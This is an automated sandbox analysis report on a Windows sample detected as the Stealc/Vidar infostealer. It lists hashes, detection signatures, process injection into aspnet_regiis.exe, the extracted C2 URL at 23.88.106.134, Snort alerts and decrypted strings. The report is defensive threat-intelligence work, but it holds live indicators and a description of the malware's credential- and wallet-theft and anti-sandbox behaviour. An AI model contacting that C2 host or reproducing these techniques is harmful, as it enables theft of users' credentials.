Edit tour

Windows Analysis Report
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Overview

General Information

Sample name:	f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Analysis ID:	1454088
MD5:	9c2b900d014ba5b9dfd0ca6cef201753
SHA1:	e5705841f68d9443ba5efb553aa9f87556e403e5
SHA256:	f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf317fab7b3e90281b5d05
Tags:	exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe" MD5: 9C2B900D014BA5B9DFD0CA6CEF201753)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}

Threatname: Vidar

{"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe PID: 7520	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7596	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7596	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.aspnet_regiis.exe.2750000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.aspnet_regiis.exe.2750000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
2.2.aspnet_regiis.exe.2750000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
2.2.aspnet_regiis.exe.2750000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
Click to see the 5 entries

Snort Signatures

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 23.88.106.134 - Destination IP: 192.168.2.4

Timestamp:	06/08/24-20:21:59.805841
SID:	2051828
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 23.88.106.134

Timestamp:	06/08/24-20:21:59.555146
SID:	2044244
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 23.88.106.134 - Destination IP: 192.168.2.4

Timestamp:	06/08/24-20:22:00.160152
SID:	2051831
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 23.88.106.134

Timestamp:	06/08/24-20:21:58.692257
SID:	2044243
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 23.88.106.134

Timestamp:	06/08/24-20:21:59.902142
SID:	2044246
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://23.88.106.134/6a9f8e2503d99c04.phpGS	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpwser	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpC	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php?S	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpm	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpiSS	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phppenSSH	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpz	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpition:	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php)	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpcS	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x	Avira URL Cloud: Label: malware
Source: http://23.88.106.134	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php6	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
Source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}

Multi AV Scanner detection for domain / URL

Source: http://23.88.106.134/6a9f8e2503d99c04.php	Virustotal: Detection: 12%	Perma Link
Source: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll	Virustotal: Detection: 11%	Perma Link
Source: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll	Virustotal: Detection: 12%	Perma Link
Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll	Virustotal: Detection: 11%	Perma Link
Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll	Virustotal: Detection: 11%	Perma Link
Source: http://23.88.106.134/6a9f8e2503d99c04.phpition:	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\d3d9.dll

ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	ReversingLabs: Detection: 37%
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Virustotal: Detection: 34%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\d3d9.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: lstrcatA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: OpenEventA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateEventA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CloseHandle
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Sleep
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: VirtualFree
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: lstrlenA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ExitProcess
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: user32.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateDCA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sscanf
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HAL9TH
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: JohnDoe
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DISPLAY
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: http://23.88.106.134
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: /6a9f8e2503d99c04.php
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: /566d6e1ec8db6394/
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: cuapfss
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GlobalLock
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HeapFree
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetFileSize
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GlobalSize
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Process32Next
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Process32First
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: LocalFree
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: FindClose
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ReadFile
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: WriteFile
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateFileA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CopyFileA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetLastError
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GlobalFree
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: OpenProcess
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ole32.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: wininet.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: shell32.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: psapi.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SelectObject
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BitBlt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DeleteObject
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdipGetImageEncoders
